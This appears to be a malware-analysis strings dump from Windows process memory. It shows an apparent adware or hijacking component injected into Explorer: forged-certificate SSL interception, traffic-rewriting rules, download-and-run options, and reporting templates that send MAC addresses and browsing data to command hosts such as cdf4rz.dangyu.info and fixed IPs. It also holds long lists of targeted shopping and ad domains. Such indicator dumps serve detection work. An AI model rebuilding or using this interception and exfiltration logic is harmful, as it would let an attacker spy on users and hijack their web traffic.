HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3752:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

conhost.exe_3472:


Setup.exe_2448:


sdfCF40.exe_2912_rwx_00390000_00010000:

%0Xf3

conhost.exe_2328:


sdfCF40.exe_2912_rwx_03830000_0000E000:

.Mbf3

ytab_m_1_big.exe_3664:


adv_334.exe_3644:


taskeng.exe_1748:


Explorer.EXE_1440_rwx_01C50000_00006000:


Explorer.EXE_1440_rwx_077C0000_00224000:

http\shell\open\command\
GetDefaultBrowserPath(), RegOpenKeyEx(%s) fail, error=%0X
GetDefaultBrowserPath(), RegQueryValueEx(%s) fail, dwType=%0X, error=%0X
GetDefaultBrowserPath(), RegQueryValueEx(%s) OK, wszBuffer=%s
NfCheckDns pid=%d, Domain=%s
NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not read for SSL, soSSL ByPass
NfCheckDns process[%s], processId=%d, rmport=%d, remoteAddr=%s, iFlag=%d, process not ready for SSL, soSSL ByPass, errno=%x
opera.exe
NfCheckDns process is opera.exe version=%s
[1234567890.] 
NfCheckDns IP=%s match
NfCheckDns is not ssl Try Domain=%s
NfCheckDns have try SSL Domain=%s icount=%d, match
NfCheckDns try SSL Domain=%s icount=%d
NfCheckDns Domain=%s match, i=%d
NfCheckDns Domain=%s not match
NfCheckSSLDomain pid=%d, Domain=%s
NfCheckSSLDomain IP=%s match
NfCheckSSLDomain Domain=%s match, i=%d
NfCheckSSLDomain Domain=%s not match
RefreshDns domain=%s
RefreshDns m_SSLIPMap p->Flags.DW=%x, DNSREC_AUTHORITY ip=%s
RefreshDns m_SSLIPMap.insert m_SSLIPMap ip=%s
hXXps://([^/:] ):443/(S*)
HTTP/1.1 302 Found
cdf4rz.dangyu.info
54.201.224.55
get_httpresp: connect [%s] faile
get_httpresp: connect [%s] ok
get_httpresp: try connect ip=%s
get_httpresp: send(%s) faile
GET /%s/log/err.php HTTP/1.1
Host: %s
QUDAO: %s
Agent: %s
MACS: %s
ERRIMG: %s
Cookie: %s
NfCheckRules process[%s], rmport=%d, remoteAddr=%s, iFlag=%d
HTTP/1.1 200 OK
hXXp://([^/] )/(\S*)
ProxyReq PxAct=%s
ProxyReq PxAct=Fellow, URL=%s
ProxyReq PxAct=Fellow, headers=%s
ProxyReq PxAct=Fellow, RespToMSTCP httpresp=%.*s
PxyRspUrl
ProxyReq PxyRsp, PxyRspUrl=%s
Post_PxyRsp , PxyRspUrl=%.*s
[NF]rule[%d][%s], format=%.*s not support %%*,n
[NF]rule[%d][%s], format=%.*s [%d,%d] over range!!!!
[NF]rule[%d][%s], format=%.*s [%d,%d] not exist!!!!
nurl
toexe.filename
toexe.args
nrspurl
rw_rule[%d]: iTimes[%d] - rw_checktime[%d] >= rw_rule[%d].rw_fttime[%d]
rw_rule[%d]: iTimes[%d] >= GlobalVars::gst_rw_rule[%d].iLimits[%d]
CheckGetType rw_rule[%d] rw_conds[%d] is not Match, but refered!!!!
rr_rule[%d]: iTimes[%d] >= GlobalVars::gst_rr_rule[%d].iLimits[%d]
[NF]Replace rule[%d], format=%.*s [%d,%d] not exist!!!!
CheckRRType rorgcap[%d][%d]=%.*s!
ReqRep icond=%d: HS_STATUS[ilen=%d]:%.*s
ReqRep icond=%d: HS_HEAD[%s]:%s
ReqRep icond=%d: HS_CONTENT:%.*s
ReqRep Header.toSting()=%s
ReqRep[request_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s
ReqRep[request_regrsp] icond=%d: HS_HEAD[%s]:%s
ReqRep[request_regrsp] icond=%d: HS_CONTENT:*s
ReqRep finished: HS_STATUS:%s
GET /%.*s HTTP/1.1
User-Agent: Mozilla/5.0 (gid %s; cid %s)
get_httpresp: start!!, url=%.*s, headers=%s
get_httpresp: sendbuf=%s
get_httpresp: domain=%s
POST /%.*s HTTP/1.1
post_httpresp: start!! url=%.*s, headers=%s, postbody=%s
post_httpresp: sendbuf=%s
post_httpresp: domain=%s
%s size too small , the value=%.*s
g_debug=%d
g_charorg=%s
g_charmap=%s
g_exclude[%d]=%s
g_download [%d]= %s %d %s
g_precmd
([WwTt][SsHh])\s (\d )\s "([^"]*)"\s ([^\r\n]*)
g_precmd [%d]= %d %d %s %s
g_postcmd
g_postcmd [%d]= %d %d %s %s
g_postproinfo=%d
g_limflagip=%s
g_maxnet=%d
g_muteip=%s
g_rrurl
g_rrurl valus=[%.*s]!
g_irrecd valus=[%.*s]! GlobalVars::g_irrecd=%d
g_imaxrcv valus=[%.*s]! GlobalVars::g_imaxrcv=%d
g_bFilterSSL=%d
g_rootm_x509URL
g_rootm_x509URL valus=[%.*s]!
g_rootm_pkeyURL
g_rootm_pkeyURL valus=[%.*s]!
g_rootm_x509Len=%d
g_rootm_pkeyLen
g_rootm_pkeyLen=%d
g_rootm_subject=%s
g_blockspdy=%d
g_rootm_x509RegURL
g_rootm_x509RegURL valus=[%.*s]!
g_sslkey
g_sslkey valus=[%.*s],expanded keyfile=%s!
g_rootm_x509RegLen=%d
g_tjdefbrowser=%d
g_tjssldomain=%d
g_rptsslrdy=%d
g_sslbrowser=%s
g_ssltrybrowser=%s
g_ssldomain2ip=%d
g_heartbeat=%d
nf_rule GlobalVars::i_rules=%d, domain=%s
gethostbyname(%s) error
nf_rule GlobalVars::i_rules=%d, domain=%s be resolved
rw_id valus=[%.*s] crw_rule.rw_id=%d
rw_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
rw_act valus=[%.*s]! crw_rule.rw_act=%d
rw_tounzip valus=[%.*s]! crw_rule.tounzip=%d
rw_psturl
rw_psturl valus=[%.*s]!
rw_limit valus=[%.*s] crw_rule.iLimits=%d
rw_arfi already exist index[%d]=%s!
rw_arfi dont exist index[%d]=%s, filename=%.*s!
rw_arfi new one index[%d]=%s!
rw_nurl
rw_nurl valus=[%.*s]!
rw_groupid valus=[%.*s] > MAX_GROUPS reset crw_rule.groupid=%d
rw_groupid valus=[%.*s] crw_rule.groupid=%d
rw_ckid valus=[%.*s] crw_rule.rw_ckid=%d
rw_fttime valus=[%.*s] crw_rule.rw_fttime=%d
rw_act valus=[%.*s]! crw_rule.rw_checktimemode=%d
rw_execmd
rw_execmd = %d %d %s %s
rw_map[%d] [%s] ==> [%s]!
nf_rule m_dnsrules.insert(%s)
nf_rule m_dnsset.insert(%s)
nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%s
nf_rule GlobalVars::i_rules=%d, add m_SSLIPMap[%s] ip=%d.%d.%d.%d
nf_dns GlobalVars::gi_dns=%d, match rules=%s, resolve ip=%d.%d.%d.%d
icur_rrrule=%d, iget_conds=%d, rq_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
icur_rrrule=%d, irsp_conds=%d, rr_cond match=[%.*s %.*s], isNOT = %d, isOR=%d, replace=[%.*s]!
rr_act valus=[%.*s]! crw_rule.rr_act=%d, g_rrmode=%d
rr_rspurl
rr_rspurl valus=[%.*s]!
rr_tounzip valus=[%.*s]! crr_rule.rw_tounzip=%d
certinfo.daysValid=%d
certinfo.sigType=%d
certinfo.subject.commonName=%s
certinfo.subject.country=%s
certinfo.subject.email=%s
certinfo.subject.friendName=%s
certinfo.subject.locality=%s
certinfo.subject.org=%s
certinfo.subject.state=%s
certinfo.subject.sur=%s
certinfo.subject.unit=%s
pf_insertCADns(%s,%s)
VerifyCertContent fail, sleept=%d, give up
VerifyCertContent fail, sleept=%d
Process_Config get x509[%s], ntStatus=%d, lssl=%d
Process_Config get pkey[%s], ntStatus=%d, lssl=%d
cdf4pz.dangyu.info
cdf4pz.insearchs.com
hXXp://%s:%d/%s/adobe.com/config.php
09:18:02
MAC: %s
BT: %s %s
Proc: %s
PathUnExpandEnvStrings %s fail
CreateFile %s faile, errno=%d
hXXp://
rw_rsps[%d]:%.*s
reps=%.*s, isBackRef=%d
refcap[%d][%d] malloc:%.*s
processReceive[respond_regrsp] icond=%d: HS_STATUS[ilen=%d]:*s
processReceive[respond_regrsp] icond=%d: HS_HEAD[%s]:%s
processReceive[respond_regrsp] icond=%d: HS_CONTENT:*s
processRReceive rsps[%d]->ePF == HS_HEADER, find Header[%s], length=%d
processReceive rsps[%d]->ePF == HS_HEADER, find Header[%s]
processReceive rsps[%d]->ePF == HS_CONTENT/HS_STATUS, iLen=%d, content=%.*s
processRReceive %%d,d reps =%.*s
processRReceive not %%d,d reps =%.*s
processRReceive reps=%.*s isBackRef=%d
processRReceive rw_rsps[%d] match cap=%.*s
processRReceive i=%d rw_rsps cap=%.*s,%%%d^%%%d
processRReceive i=%d rrsp_conds cap=%.*s,%%%d^%%%d
ReportRecord: iformat=%d, format=%.*s
processRReceive 8 pTcpNE->rorgcap[1][0]=%.*s
ReportRecord irrule=%d, icond=%d, igroup=%d, rorgcap=%.*s, len=%d, record=%.*s, len=%d
ReportRecord: 2 iformat=%d, format=%.*s
ReportRecord irrule=%d, record=%.*s, ilen=%d
ReportRecord: 3 iformat=%d, format=%.*s
ReportRecord: 4 iformat=%d, format=%.*s
ProcRR, ReportRecord len=%d, buff:%.*s
ProcRR sendrpt %s
CheckGetType(id=%I64u) gettype= %d
rrtype= %d
{"browser":"%s","conn":"%s=>%s","httperr":"RspUncompress fail,rt=%d"}
httperr %s
()$^.* ?[]|\-{},:=!
threadStart id=%d
NfCheckRules (id=%I64u) localport=%d, localAddr=%s, rmport=%d, remoteAddr=%s, iFlag=%d
{"browser":"%s","ssltry":"FAIL"}
LogSSLTryBrowser %s
{"browser":"%s","ssltry":"OK"}
{"browser":"%s","conn":"%s=>%s","domain":"%s"}
LogSSLDomain %s
dataPartAvailable OT_SSL_HANDSHAKE_OUTGOING rt=%d, hostname=%.*s
{"browser":"%s","sslerr":"%s"}
LogSSLException %s
have %s
VVV.baidu.com
VVV.google.com
VVV.126.com
%s.tmp
downloadfile[%s] fail
1.3.6.1.5.5.7.3.1
1.3.6.1.4.1.311.10.3.3
2.16.840.1.113730.4.1
nf_getProcessName=%s, pproc=%s
resolve wmi_dirip[%s]=%s OK
%.4d%.2d%.2d %.2d:%.2d:%.2d:%d
nf_getDisplayFromKernel g_MACs=%s
getMACInfo %s
{"defbrowser":"%s","version":"%s"}
heartbeat upt=%d minutes
tfpf stop, isnfinit=%d, ispfinit=%d, bIsFaile=%d, living time=%d!
{"ImageBase":"%0X","ImageSize":"%u","buildNumber":"%u"}
HTTP/1.
http/1.
Wtsapi32.dll
SSL\SSLDataProvider.cpp
%s-%s#ss
%s-%s-%s#child
{"browser":"%s","conn":"%s=>%s","domain":"%s","msg":"%s"}
127.0.0.1
SSLFilter.cpp
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() getSelfSignedCert(test) failed
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() sdTemp.init failed
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() bypass exception
__FILE__:%s, __LINE__:%d, SSLFilter::tcp_packet() Weak DH prime, do not filter such connections
__FILE__:%s, __LINE__:%d, addTlsException(TLS_ALL_CIPHERS)
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, getSelfSignedCert fail
__FILE__:%s, __LINE__:%d, getSignedCert fail
__FILE__:%s, __LINE__:%d, m_sdLocal.init fail
__FILE__:%s, __LINE__:%d, BIO_write fail
__FILE__:%s, __LINE__:%d, SSL_accept(m_sdLocal.m_pSSL) fail, err=%d
__FILE__:%s, __LINE__:%d, SSL_get_peer_certificate fail
__FILE__:%s, __LINE__:%d, SSL_accept fail, err=%d
__FILE__:%s, __LINE__:%d, SSLRead_client, err=%d
__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE, len == 0
__FILE__:%s, __LINE__:%d, SSL_accept fail, n=0
__FILE__:%s, __LINE__:%d, SSLRead_server, n=%d
__FILE__:%s, __LINE__:%d, SFS_SERVER_HANDSHAKE_REQUEST_CLIENT_CERT, n=0
__FILE__:%s, __LINE__:%d, SSLRead_client, n=%d
__FILE__:%s, __LINE__:%d, SSL_accept, err=%d
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), err=%d
__FILE__:%s, __LINE__:%d, SSL_connect(m_sdRemote.m_pSSL), n=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLFilter::tcp_packet() bypass exception
surfeasy.com
opera-proxy.net
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, host is surfeasy.com or opera-proxy.net
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) err=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) n=0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write fail
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSLRead_client(m_sdRemote) fail
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) fail, errno=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_connect(m_sdRemote.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) fail, errno=%d
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, SSL_accept(m_sdLocal.m_pSSL) == 0
__FILE__:%s, __LINE__:%d, SFS_DATA_EXCHANGE, BIO_write < 0
PORT
504 Unsupported transfer mode
504 Unsupported command
PORT
%s.%s.%s.%s:%d
%s:%s
[%s]:%s
File-Count: %d
Total-Bytes: %d
File-Name: %s
{0946134E-4C7F-11D1-8222-444553540000}
|.^$* ?()[\
(Windows%d.%d.%d)
SYSTEM\CurrentControlSet\Services\%s
NBMediaInfo_Adv.ini
%s\system32\%s
NBMediaInfo_Adv.ini;
0.0.0.0
%s:xxxxxx|
1.0.1.0
%d.%d.%d.%d
WARNING: %s failed with error %d (%s)
cdf4ps.dangyu.info
GET /xcldnfpf/log/proclog.php HTTP/1.1
get_httpresp: send(%s) ok
CreateProcessAsUser(%s %s ) fail errno[%d]
WinExecAndWait32(%s %s ) timeout[%d]
H:\nfsdk-src-1.5.1.4-pf-src-1.1.6.8\bin\Release\Win32\PFHttpContentFilter.pdb
PFHttpContentFilter.dll
GetWindowsDirectoryA
KERNEL32.dll
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
PSAPI.DLL
WS2_32.dll
DNSAPI.dll
CertCreateCertificateContext
CertFreeCertificateContext
CertGetCertificateChain
CertFreeCertificateChain
CertOpenStore
CertAddEncodedCertificateToStore
CertVerifyCertificateChainPolicy
CertCloseStore
CertOpenSystemStoreA
CertEnumCertificatesInStore
CertFindCertificateInStore
CertAddCertificateContextToStore
PFXExportCertStoreEx
CRYPT32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
GetCPInfo
PeekNamedPipe
USER32.dll
ReportEventA
OLEAUT32.dll
l}C.we
zcÁ
.?AVHttpFilter@@
.?AVHTTPFilter@ProtocolFilters@@
.?AVSMTPFilter@ProtocolFilters@@
.?AVFTPFilter@ProtocolFilters@@
.?AVFTPDataFilter@ProtocolFilters@@
Inappropriate I/O control opera
C:\Windows\Explorer.EXE
4C987A994A63A342018DC4A6FA86CD43.tmp
54.190.23.82
.google-analytics.com
.doubleclick.net
.googleadservices.com
.google.com
.facebook.com
.bidswitch.net
.amazon.com
.amazon.cn
.agoda.com
.booking.com
.makemytrip.com
.tripadvisor.
VVV.expedia.
.edreams.com
.priceline.com
.rentalcars.com
.kayak.com
.hotelurbano.com
.decolar.com
.hotelscombined.com
.trivago.com
.hostelworld.com
.orbitz.com
.hoteltonight.com
.youzhan.com
.biyi.cn
.hilton.com
.hilton.com.cn
.aliexpress.com
.bwinpartypartners.com
.walmart.com
secure.booking.com
googleads.g.doubleclick.net
VVV.googleadservices.com
VVV.googletraveladservices.com
knowbrid.com
VVV.twoptrip.com
.bstatic.com
VVV.google.
s.click.aliexpress.com
.ebay.com
VVV.ebay.
rover.ebay.
cgi.ebay.
.bing.com
.netshoes.com.mxar
.linksynergy.com
.ad.soicos.com
.area51buy.com
.saraiva.com.br
.m.pontofrio.com.brarea51buy.com
.m.extra.com.brarea51buy.com
.googlesyndication.com
.zoznam.skzougla.grzonaprop.com.arziare.comzengaming.comyouweekly.gryahoo.comyadi.skxskt.com.vnxem.vnwydawajdobrze.comwyborcza.plVVV.kurir.rs
.VVV.ad.nlwuxiaworld.comwradio.com.mxwowkeren.comwowhead.comworldtimeserver.comworldofmods.ruworldofmods.comworldofbrowsers.comwork.uawikidot.com
.webdunia.comwebaslan.comwday.ruwaseet.netwallpaperswide.comwalla.co.ilw2.animekage.funvulearning.comvstplanet.comvnexpress.netviva.co.idvisioncloud.info
.vijesti.mevietnamnet.vnvietdesigner.netvesti-online.comvector.mevanguardia.comvagas.com.bruznayvse.ruuzmanim.netutre.bgurdupoint.comurbandictionary.com
.upsocl.comuniversomarvel.com.aqultimate-guitar.comujsagomat.huucoin.nettweaktown.comtvonline.idtvnet.lvtuyensinh247.comtunisie-annonce.comtunein.com
.trucksimulator2.rutrophymanager.comtriviador.nettrinixy.rutribalwars.com.pttrend-chaser.comtrabalhosfeitos.comtrabajando.cltotaljerkface.comtomsguide.com
.titirez.rotistory.comtimesofindia.comtimefortravel.netthestar.com.mythesaurus.comthemepack.methehotgames.comtestony.comterra.com.brtennislive.net
.temp-mail.orgtelondasmu.comtelemagazyn.pltelecinco.estechradar.comtechgage.comtawjihnet.nettass.rutampermonkey.nettalks.bytakvim.com.trtailieu.vn
.szekelyhirdeto.infosweetygame.comsuperlutas.com.brsuperhry.czsuperhex.iosuperesportes.com.brsuperdeporte.essugklonistiko.grsubs4series.comsuara.com
.suapesquisa.comstyle-style.comstrelyaj.rustrefa-beki.plstrawpoll.mestockrom.netstartlap.huspynews.rosprzedajemy.plsppokupki.rusport5.co.ilsport360.com
.sport24.grsport24.co.zasponser.co.ilsplix.iospielen.comspfc.netspec-komp.comspanishdict.comsoompi.comsoftobase.comsmods.rusmart-gsm.comslodkiflirt.pl
.skysports.comskyatnightmagazine.comsketchuptextureclub.comsina.com.cnsims4updates.netshopclues.comshemsfm.netshahidlive.cosethmumu.euserebii.netseneweb.com
.segundamano.mxsdamgia.ruscholarship-positions.comsbt.com.brsatoshiwars.comsakshi.comsahadan.comru-minecraft.rurtl.hrrpp.peromania-matrimoniale.ro
.rockingrackets.comreuters.comrepublika.co.idredmondpie.comreddit.comred-hack.rurecord.com.mxrealoem.comratingcero.comranker.comracingbazar.huquotev.com
.quizzmagic.comquizur.comquizalert.compudelek.plprothom-alo.comprogramas-gratis.netpriceprice.comppomppu.co.krpostimees.eepoki.ropokexperto.netpokemondb.net
.pof.complemiona.plplazmaburst2.complayrust.iopini.com.brpicresize.compentapostagma.grpearltrees.compcworld.compcmdaily.compcgamer.compbh2.com
.parentsdome.comparalink.compapajogos.com.brpanet.co.ilpandlr.compaisdelosjuegos.com.arpacogames.comoverclock.netournewstoday.comotvfoco.com.brotomoto.pl
.opensooq.comop.ggontvtime.ruonline-station.netonline-convert.comonegoodthingbyjillee.comon.ccolx.inolx.bgole.com.arolay.com.trokazjum.plojogo.pt
.odkrywcze.plodatv.comobservador.ptoantagonista.comntv.com.trntruyen.infonovinite.eunotebookcheck.netnextmedia.comnewsit.grnewsbomb.grnetfontes.com.br
.net.hrnbalive.ggnaszemiasto.plnaszemargo.plnamedycyne.eumytopgames.netmysmartprice.commyiconpack.commuthead.commuslm.orgmundopositivo.com.brmundonick.com
.mskins.netmowatine.commoonbunnycafe.commohmal.commodworkshop.netmoduri.romodthesims.infomodsgaming.rumods-download.commodfiles.rumoddingway.com
.mod-minecraft.netmmorpg.commlb.commiseria.com.brmiroworld.rumio.tominecraftskins.netminecraftservers.orgminecraftcapes.co.ukmilkyblog.commilenio.com
.milanuncios.commidianews.com.brmetacritic.commerriam-webster.commbc3.netmbc.netmawdoo3.commasrawy.commapsofindia.commapskins.commangahost.net
.maltatoday.com.mtmalaysiable.newsmalavida.commako.co.ilmajorcineplex.commaalaimalar.comls2017.comlowadi.comlovebox.hulove-sims.rulooperman.comlolking.net
.liveuamap.comlivestrong.comlivejournal.comlinguee.eslinguee.com.brlinguee.comlindaikejisblog.comlifewire.comlibertatea.rolibertaddigital.comleninja.com.br
.lelscans.colefora.comleagueofgraphs.comlawebdelprogramador.comlarazon.eslapaginamillonaria.comlaodong.com.vnlance.com.brlacuerda.netlacapital.com.ar
.kurzy.czkulichki.netkudapostupat.bykreszteszt.netknowyourmeme.comkino-teatr.rukijiji.cakhoahoc.tvkhaleejtimes.comkerdos.grkbhgames.comkariyer.net
.karaopa2.rukamusaati.comjuegosdechicas.comjoq.aljobthai.comjobth.comjobrapido.comjn.ptjingames.netjeuxvideo.comjeu.infojavedch.comjapainfo.com.br
.jagranjosh.comislcollective.comislampos.comirecommend.ruinterpals.netinstalki.plinsomnia.grinfojobs.netinfoempleo.cominfoeme.cominewsgr.comindiamart.com
.indiabix.comincrivel.clubiha.com.trigre123.netiefimerida.gricy-veins.comi-drpciv.rohypescience.comhurriyetemlak.comhuffingtonpost.inhoy.com.py
.howtogeek.comhotnews.rohomebasework.nethdonline.vnhattrick.orghackedonlinegames.comhaber1903.comgulfnews.comguiamais.com.brgtaall.com.brgsmsandwich.com.ph
.gravitytales.comgratka.plgota.iogosugamers.netgossiplankanews.comgoodfon.rugoodfamilynews.comgogy.comglobes.co.ilglaz.tvgiallozafferano.itgeek-nose.com
.gazeteduvar.com.trgamster.orggamevicio.comgametracker.comgamesama.comgame01.rug9g.comg5u.pwfuthead.comfutbin.comfunpicplanet.comfresherslive.com
.fresh-stuff4u.comfreedownloadmanager.orgfox.com.trfotospor.comforumotion.comfixya.comfirstpost.comfilmibeat.comfilgoal.comfile-minecraft.comfibladi.dz
.fibalivestats.comfextralife.comfarodevigo.esfarmingsimulator2017.comfarmingmods2015.comfarmingmod.comfarming2017mod.comfarming2015mods.comfarfesh.comfanpage.gr
.fanatik.rofakt.plfafan.krfacilisimo.comexpansion.comexcelsior.com.mxexamveda.comeverydayfeminism.comeva.vneuropapress.eseuro2day.gressada.net
.espnfcasia.comesotericblog.ruepaperlokmat.inentgaming.netentertaintastic.comencuentra24.comempregacampinas.com.brelwatannews.comelpais.comelonce.com
.elnuevodiario.com.nielmaz.comelle.ruelkhabar.comelespectador.comelectronica-pt.comeldiario.eseldestapeweb.comelcorreo.comelcomercio.eselcolombiano.com
.ekantipur.comehowenespanol.comedu-dz.comecoustics.comechoroukonline.comebay.inebay.esebay.dee-monsite.comduolingo.comdummies.comdrugs.comdriver.ru
.drive2.comdressupgames.comdota2lounge.comdota2.rudlouha-videa.czdlh.netdl-protecte.comdivyabhaskar.co.indisneylatino.comdiscuss.com.hkdir.bgdigit.in
.dictionary.comdiariodocentrodomundo.com.brdemotywatory.pldelfi.lvdeckshop.prodcinside.comdanviet.vndailythanthi.comcyberforum.rucumhuriyet.com.tr
.cuantarazon.comcswarzone.comcsgojoe.comcosmopolitan.comcorel-clipart.rucordobavende.comcomputerhoy.comcompraensanjuan.comcomo-eliminar.comcohet.orgcoeg.in
.cnn.comclicrbs.com.brclick.roclavier-arab.orgclasicooo.comciudad.com.arcitethisforme.comcinemagia.rocienradios.comchw.netchuing.netchron.comchip.de
.chip.com.trchimsedinang.comchiletrabajos.clchicosabetudo.com.brcheatcc.comcentraldemangas.net.brcdiscount.comcatfly.rocareersmoveinsa.co.zacancan.ro
.cadena3.combursakerjadepnaker.combuhamster.combuenastareas.combttp-rpg.combseindia.combrightside.meboycracked.combotosani.robongdaplus.vnbomcondutor.pt
.bolsamania.combolha.combobaedream.co.krblogspot.ptblogspot.peblogspot.mkblogspot.com.coblikk.hublacksmith-ran.onlinebinbox.iobgmaps.com
.bestauto.robelmeta.combebekoyunu.com.trbeautifulnara.combeautifuldiscount.combazos.skbazi-otdiha.com.uabazar.bgbarbioyunu.com.trbanglanews24.combaby.ru
.bab.laautotrader.co.ukautoscout24.esautoline.byautobip.comaulafacil.comaukcije.hratsmod.netasianwiki.comasianfanfics.comarynews.tvarchdaily.com
.aquaforum.uaappledaily.com.twanimesonlinebr.com.branimedigitalnetwork.franime-legend.comangelinajoliebrasil.com.brandroidpit.com.brandroidmtk.com
.andhrajyothy.comancient-origins.netanandabazar.comamorenlinea.comamericatv.com.peamadershomoy.bizalyaoum24.comalphacoders.comalo.bgalmogaz.comalmaghreb24.com
.alfavita.grakhbarona.comagnocafe.com.bragariogame.clubagarabi.comaek365.comadslzone.netabw.byabplive.inabout.com9tv.co.il9docu.com90min.com
.ztracker.orgzombs.iozmovs.comzlx.com.brzing.vnzi-m.infozamzar.comz-shadow.coyourdictionary.comyoum7.comynet.co.ilyeadesktopbr.comyeadesktop.comyapo.cl
.yallakora.comyad2.co.ily8.comxtraaa.comxenoversemods.comxe.grVVV.utopya.onlineVVV.telegraf.rsVVV.blic.rswormax.ioworldoftruckstr.comwordreference.com
.wordpress.comwordgames.comwoman.ruwikia.comwebmd.comweb.idway2sms.comwaplog.comwallpaperscraft.comvseigru.netvonvon.mevivud.comvivalocal.comvetogate.com
.vesti.bgvendobara.comvecernji.hruzone.iduukanshu.netuptodown.comuploadfiles.euupdatestar.comup-4ever.comukr.netufreegames.comuc123.com
.uai.com.brtwoo.comtv-alnoor.comtutorialspoint.comtut.byturkcealtyazi.orgtureng.comttt4.comtrueactivist.comtrud.comtribunnews.comtransfermarkt.com.tr
.transfermarkt.comtportal.hrtopigri.bgtomshardware.comtomshardware.co.uktitlovi.comtime-to-read.ruthewindowsclub.comthesimsresource.comthepurselover.com
.thepicta.comthefreedictionary.comthanhnien.vnthaiware.comth3professional.comteemo.ggtechtudo.com.brtechnopat.netteamliquid.nettamindir.comtaimienphi.vn
.tagged.comt24.com.trsymbolab.comsuperdownloads.com.brstudopedia.rustudfiles.rustiripesurse.rostatsroyale.comstarhit.rustardoll.comss.lvsprashivalka.com
.sporx.comsportpeaks.comsportingnews9.comsport.plsport.essport-fm.grspinz.iospeedtest.netsozcu.com.trsorubak.comsondakika.comsoftpedia.comsoftonic.com
.soccerway.comslobodnadalmacija.hrskai.grsimulatorgamemods.comsimolesr.comsiamsport.co.thshink.insfgate.comsearpages.comseargoo.comsdna.grscoalarutiera.ro
